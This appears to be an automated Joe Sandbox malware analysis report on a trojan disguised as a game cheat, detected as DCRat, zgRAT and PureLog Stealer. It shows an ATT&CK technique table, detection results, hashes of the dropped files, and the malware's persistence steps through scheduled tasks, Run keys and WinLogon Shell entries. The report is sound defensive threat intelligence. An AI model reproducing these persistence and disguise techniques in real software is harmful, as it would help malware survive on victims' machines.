                                    Deobfuscate/Decode Files or Information                                    		LSA Secrets1
                                    Application Window Discovery                                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                                    Obfuscated Files or Information                                    		Cached Domain Credentials3
                                    File and Directory Discovery                                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
                                    Software Packing                                    		DCSync37
                                    System Information Discovery                                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                    DLL Side-Loading                                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                                    File Deletion                                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1590012 Sample: SAMP_CHEAT_ATVECHAU2.exe.bin.exe Startdate: 13/01/2025 Architecture: WINDOWS Score: 100 77 Suricata IDS alerts for network traffic 2->77 79 Found malware configuration 2->79 81 Antivirus detection for dropped file 2->81 83 14 other signatures 2->83 10 SAMP_CHEAT_ATVECHAU2.exe.bin.exe 3 6 2->10         started        13 services.exe 2->13         started        16 jnowHpJlZlXal.exe 2 2->16         started        18 4 other processes 2->18 process3 file4 67 C:\...\BridgePortsurrogateserverref.exe, PE32 10->67 dropped 20 wscript.exe 1 10->20         started        97 Antivirus detection for dropped file 13->97 99 Multi AV Scanner detection for dropped file 13->99 101 Machine Learning detection for dropped file 13->101 signatures5 process6 signatures7 85 Windows Scripting host queries suspicious COM object (likely to drop second stage) 20->85 87 Suspicious execution chain found 20->87 23 cmd.exe 1 20->23         started        process8 process9 25 BridgePortsurrogateserverref.exe 7 35 23->25         started        29 conhost.exe 23->29         started        file10 59 C:\msportComWin\jnowHpJlZlXal.exe, PE32 25->59 dropped 61 C:\Users\user\Desktop\vyXTwjuX.log, PE32 25->61 dropped 63 C:\Users\user\Desktop\fSPDjruA.log, PE32 25->63 dropped 65 10 other malicious files 25->65 dropped 89 Multi AV Scanner detection for dropped file 25->89 91 Creates an undocumented autostart registry key 25->91 93 Creates multiple autostart registry keys 25->93 95 4 other signatures 25->95 31 csc.exe 4 25->31         started        35 csc.exe 25->35         started        37 powershell.exe 25->37         started        39 21 other processes 25->39 signatures11 process12 file13 69 C:\Program Files (x86)\...\msedge.exe, PE32 31->69 dropped 73 Infects executable files (exe, dll, sys, html) 31->73 41 conhost.exe 31->41         started        43 cvtres.exe 1 31->43         started        71 C:\Windows\...\SecurityHealthSystray.exe, PE32 35->71 dropped 45 conhost.exe 35->45         started        47 cvtres.exe 35->47         started        75 Loading BitLocker PowerShell Module 37->75 49 conhost.exe 37->49         started        51 conhost.exe 39->51         started        53 conhost.exe 39->53         started        55 conhost.exe 39->55         started        57 17 other processes 39->57 signatures14 process15

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand

                                    Antivirus, Machine Learning and Genetic Malware Detection

                                    Initial Sample

                                    SourceDetectionScannerLabelLink
                                    SAMP_CHEAT_ATVECHAU2.exe.bin.exe56%VirustotalBrowse
                                    SAMP_CHEAT_ATVECHAU2.exe.bin.exe68%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    SAMP_CHEAT_ATVECHAU2.exe.bin.exe100%AviraVBS/Runner.VPG
                                    SAMP_CHEAT_ATVECHAU2.exe.bin.exe100%Joe Sandbox ML

                                    Dropped Files

                                    SourceDetectionScannerLabelLink
                                    C:\Users\user\AppData\Local\Temp\8SIf5KWJtt.bat100%AviraBAT/Delbat.C
                                    C:\Recovery\services.exe100%AviraTR/Spy.Agent.dcvxq
                                    C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe100%AviraTR/Spy.Agent.dcvxq
                                    C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe100%AviraTR/Spy.Agent.dcvxq
                                    C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe100%AviraTR/Spy.Agent.dcvxq
                                    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe100%Joe Sandbox ML
                                    C:\Recovery\services.exe100%Joe Sandbox ML
                                    C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe100%Joe Sandbox ML
                                    C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe100%Joe Sandbox ML
                                    C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe100%Joe Sandbox ML
                                    C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe55%VirustotalBrowse
                                    C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe55%VirustotalBrowse
                                    C:\Recovery\jnowHpJlZlXal.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Recovery\jnowHpJlZlXal.exe55%VirustotalBrowse
                                    C:\Recovery\services.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\EcfIfcKE.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\MGoyPVal.log29%ReversingLabsWin32.Trojan.Generic
                                    C:\Users\user\Desktop\VjwnzPpT.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\VrgGeyQY.log25%ReversingLabs
                                    C:\Users\user\Desktop\fSPDjruA.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\vyXTwjuX.log8%ReversingLabs
                                    C:\msportComWin\BridgePortsurrogateserverref.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\msportComWin\jnowHpJlZlXal.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat

                                    Unpacked PE Files

                                    No Antivirus matches

                                    Domains

                                    No Antivirus matches

                                    URLs

                                    No Antivirus matches

                                    Domains and IPs

                                    Contacted Domains

                                    No contacted domains info

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://aka.ms/pscore68powershell.exe, 00000026.00000002.1783465174.000002563FE41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.1753750292.000001D880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1733402114.000001A6833C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.1763302374.0000016F928D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1691776577.000002BF80601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1770576287.00000146B2CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.1705344630.000001B980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1697699277.0000014B28EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.1733069605.000001B3C4C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1735567184.000001EDD75A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.1761913793.000001DCE6BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1703359712.000001FE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.1806998001.000001FA1EA61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1757555101.0000024914A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.1729234879.000001E34F331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1770411015.000001E1DB6A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.1770629189.0000016FBB1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000045.00000002.1763311905.000001FFB76D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000047.00000002.1817958201.00000298B7C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000047.00000002.1817958201.00000298B7E37000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000026.00000002.1783465174.00000256401EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.1753750292.000001D880226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1733402114.000001A6836BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.1763302374.0000016F92AF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1691776577.000002BF80827000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1770576287.00000146B2EF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.1705344630.000001B980228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1697699277.0000014B290E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.1733069605.000001B3C4E46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1735567184.000001EDD77C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.1761913793.000001DCE6DF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1703359712.000001FE80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.1806998001.000001FA1EC88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1757555101.0000024914C98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.1729234879.000001E34F558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1770411015.000001E1DB8C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.1770629189.0000016FBB46A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000045.00000002.1763311905.000001FFB78F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000047.00000002.1817958201.00000298B7E37000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameBridgePortsurrogateserverref.exe, 0000000A.00000002.1520293640.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1783465174.000002563FE41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.1753750292.000001D880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1733402114.000001A6833C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.1763302374.0000016F928D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1691776577.000002BF80601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1770576287.00000146B2CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.1705344630.000001B980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1697699277.0000014B28EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.1733069605.000001B3C4C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1735567184.000001EDD75A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.1761913793.000001DCE6BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1703359712.000001FE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.1806998001.000001FA1EA61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1757555101.0000024914A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.1729234879.000001E34F331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1770411015.000001E1DB6A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.1770629189.0000016FBB1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000045.00000002.1763311905.000001FFB76D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000047.00000002.1817958201.00000298B7C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000047.00000002.1817958201.00000298B7E37000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://github.com/Pester/Pesterpowershell.exe, 00000047.00000002.1817958201.00000298B7E37000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000026.00000002.1783465174.00000256401EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.1753750292.000001D880226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1733402114.000001A6836BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.1763302374.0000016F92AF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1691776577.000002BF80827000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1770576287.00000146B2EF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.1705344630.000001B980228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1697699277.0000014B290E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.1733069605.000001B3C4E46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1735567184.000001EDD77C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.1761913793.000001DCE6DF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1703359712.000001FE80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.1806998001.000001FA1EC88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1757555101.0000024914C98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.1729234879.000001E34F558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1770411015.000001E1DB8C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.1770629189.0000016FBB46A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000045.00000002.1763311905.000001FFB78F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000047.00000002.1817958201.00000298B7E37000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high

                                                  World Map of Contacted IPs

                                                  No contacted IP infos

                                                  General Information

                                                  Joe Sandbox version:42.0.0 Malachite
                                                  Analysis ID:1590012
                                                  Start date and time:2025-01-13 13:30:18 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 11m 41s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:91
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Sample name:SAMP_CHEAT_ATVECHAU2.exe.bin.exe
                                                  Detection:MAL
                                                  Classification:mal100.spre.troj.expl.evad.winEXE@90/113@0/0
                                                  EGA Information:
                                                  • Successful, ratio: 50%
                                                  HCA Information:
                                                  • Successful, ratio: 59%
                                                  • Number of executed functions: 216
                                                  • Number of non-executed functions: 95
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, schtasks.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
                                                  • Excluded domains from analysis (whitelisted): 77777cm.nyashtyan.in, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                  • Execution Graph export aborted for target BridgePortsurrogateserverref.exe, PID 4340 because it is empty
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  07:31:36API Interceptor398x Sleep call for process: powershell.exe modified
                                                  13:31:27Task SchedulerRun new task: jnowHpJlZlXal path: "C:\msportComWin\jnowHpJlZlXal.exe"
                                                  13:31:27Task SchedulerRun new task: jnowHpJlZlXalj path: "C:\msportComWin\jnowHpJlZlXal.exe"
                                                  13:31:30Task SchedulerRun new task: BridgePortsurrogateserverref path: "C:\msportComWin\BridgePortsurrogateserverref.exe"
                                                  13:31:30Task SchedulerRun new task: BridgePortsurrogateserverrefB path: "C:\msportComWin\BridgePortsurrogateserverref.exe"
                                                  13:31:31AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run jnowHpJlZlXal "C:\Recovery\jnowHpJlZlXal.exe"
                                                  13:31:32Task SchedulerRun new task: services path: "C:\Recovery\services.exe"
                                                  13:31:32Task SchedulerRun new task: servicess path: "C:\Recovery\services.exe"
                                                  14:39:47AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run services "C:\Recovery\services.exe"
                                                  14:39:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run BridgePortsurrogateserverref "C:\msportComWin\BridgePortsurrogateserverref.exe"
                                                  14:40:07AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run jnowHpJlZlXal "C:\Recovery\jnowHpJlZlXal.exe"
                                                  14:40:16AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run services "C:\Recovery\services.exe"
                                                  14:40:26AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run BridgePortsurrogateserverref "C:\msportComWin\BridgePortsurrogateserverref.exe"
                                                  14:40:35AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run jnowHpJlZlXal "C:\Recovery\jnowHpJlZlXal.exe"
                                                  14:40:46AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run services "C:\Recovery\services.exe"
                                                  14:40:56AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run BridgePortsurrogateserverref "C:\msportComWin\BridgePortsurrogateserverref.exe"
                                                  14:41:13AutostartRun: WinLogon Shell "C:\msportComWin\jnowHpJlZlXal.exe"
                                                  14:41:24AutostartRun: WinLogon Shell "C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe"
                                                  14:41:33AutostartRun: WinLogon Shell "C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe"
                                                  14:41:43AutostartRun: WinLogon Shell "C:\Recovery\jnowHpJlZlXal.exe"
                                                  14:41:52AutostartRun: WinLogon Shell "C:\Recovery\services.exe"
                                                  14:42:01AutostartRun: WinLogon Shell "C:\msportComWin\BridgePortsurrogateserverref.exe"

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  No context

                                                  Domains

                                                  No context

                                                  ASNs

                                                  No context

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Program Files (x86)\Microsoft\Edge\Application\CSC1E5328BD43674D66B913D17F64F40B9.TMP

                                                  Download File
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  File Type:MSVC .res
                                                  Category:dropped
                                                  Size (bytes):1168
                                                  Entropy (8bit):4.448520842480604
                                                  Encrypted:false
                                                  SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                  MD5:B5189FB271BE514BEC128E0D0809C04E
                                                  SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                  SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                  SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                  Malicious:false
                                                  Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

                                                  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                  Download File
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4608
                                                  Entropy (8bit):3.8939066343544275
                                                  Encrypted:false
                                                  SSDEEP:48:6GmFtAjxZ8RxeOAkFJOcV4MKe28dJVlPvqBHPuulB+hnqXSfbNtm:sdxvxVx9JPvkhTkZzNt
                                                  MD5:27B7A73F4796647204D3C14329356141
                                                  SHA1:4E7C4017E05D3716416A0617A22D15178C210102
                                                  SHA-256:C8B30CC0958094A9247498AB9C14BAF3474A80C125440ADB2C840B5C62898C2C
                                                  SHA-512:3F94548ADDC1FE659791809EB5AA6B917B7BCC88ACFC44CBB3964105F648C685821F6B6006D1A9C97D32B56D5CEC41A952448B507C978624CEF4ED25A5CB27B3
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.............................'... ...@....@.. ....................................@.................................<'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p'......H.......(!................................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                  C:\Program Files\7-Zip\Lang\7ebef5d49c4292

                                                  Download File
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:ASCII text, with very long lines (879), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):879
                                                  Entropy (8bit):5.9072825012408146
                                                  Encrypted:false
                                                  SSDEEP:12:5JIvtDDAc1x36D3oc4rSlMbHqRsyc0zf0dNs+VwwWhQ28ttnQzsSeUhxS/s+mTya:glfH1RIKJZy7gU+mBj8tRJFUhxccTyQN
                                                  MD5:D3136DA42C71FA40F6ECDEFE381FA3A4
                                                  SHA1:69396FD8A82F8443D799EB4DD811B9CC16BB8306
                                                  SHA-256:6A308FDE8AEE5B4FDB7FC260FC87C0FEA60C3CDD528EE4A69A155EF349732E0D
                                                  SHA-512:81BAA4BB271C68E93D2D30CD8E81008983F2F871232A2C14859F67306E22A43E197EAEFAE76A815CABC82A4782877C85A55964A074B4127979FE34E7E6B86FA7
                                                  Malicious:false
                                                  Preview:EwLHcSBQfy6uj6edjF1I9vhLlBw46qfKHOD2zK9UQOcQlLxQXyI6Hl2TO9gagGTzSwmV3mnZGg1vTRkZOfhIhjCgVtnznixJ5m8yjbWuLt0ltHA7ZHMAjLSttG9J8xwhsr0qSv0xJx6ytbwOtpafWxktTPFccNvX6S2CRUonRZ1vOeASUvaSXQK5GGWDqXU5Bj1aju7ZBxO76yfzPwIqxd9qI75K7l63E5uomjtjxBRjBN9Skhy3PnIikKSlzwba0V3AE0MpDi3vLZo47nkawCoaxMEcRHuBj1sqU8OtUJ0ruWWKfXoMMBnxqcN1wuX5x1MTq8k9Y0FmM7paz464dizhN591vW7kw433KDdhxpxW6BltxwB2xccOCoFv8sNC2e0SDwPwbYHyvdlMTQE8VFwTbp1f7riEbudbKTqBhObYVociD2csoOrxsg0Y4tyu0CWA9JCAjCbGoX8xMScFOzZMDqtocRGxariSRbj40bIlxkJUhDMmRtfAnJ7TZXhS5oq7yqfushOwrxZdhZGZFefqLipIeQec40pI4Mf1hb3tfsTztewARHMbJ9vQBXPcDw20IRiV3P2nlvLdOzYAeeLwnO94aPzKMaqszdrc5bGBPj0XyRBL8P8ikFM3So4oZrbKEcnvI6FDXJhEYlGJNoM7cIIuQxJRgclhHpTWoPCBJ4KahHerhvbvfes6U2fVwxg5i96tStf7lKxh7rMISctvB0Cn7WBvurOWYP2iKvYyQdJVrK8nqWCUEu4r7Tw5stN45bJsyo8gD5fhqr6wYYFYp4RnUKl19dFgQPZQBPyBYfQIPXBPX9hToyOAJgYoDGhkz9QbRqvIkD9JoJY7JVeA5w1bAZGe1K8R8pTPGk8qNZt

                                                  C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe

                                                  Download File
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2002944
                                                  Entropy (8bit):7.567943716522346
                                                  Encrypted:false
                                                  SSDEEP:24576:CEmEVLqBMwOk+ADUZjmwMUuTEZ/iJJjhs4P/r+iHtxItZPFtOObxoD24TKf9jUW:1Z+qwOZFM+aJJbL+iNuuMxoyW29
                                                  MD5:5F80A11E82CC7495CF5AD7DF3D052721
                                                  SHA1:3A20EB31195A97CF5DA7D3C20C1B8C4913B95A13
                                                  SHA-256:851AA5F3636700F9BB71A4C0D040255F19871BA306F87D9F66B39F3B207EC15B
                                                  SHA-512:7ACDD2A4F5170212BEABEBA86DCB7A6BE74C4C83815DB3BB328D6541F6A259EC3C6FF469F103EB125163371F103AE3060404E1C34622F2D4D9CB34D2CC7B3C0D
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                  • Antivirus: Virustotal, Detection: 55%, Browse
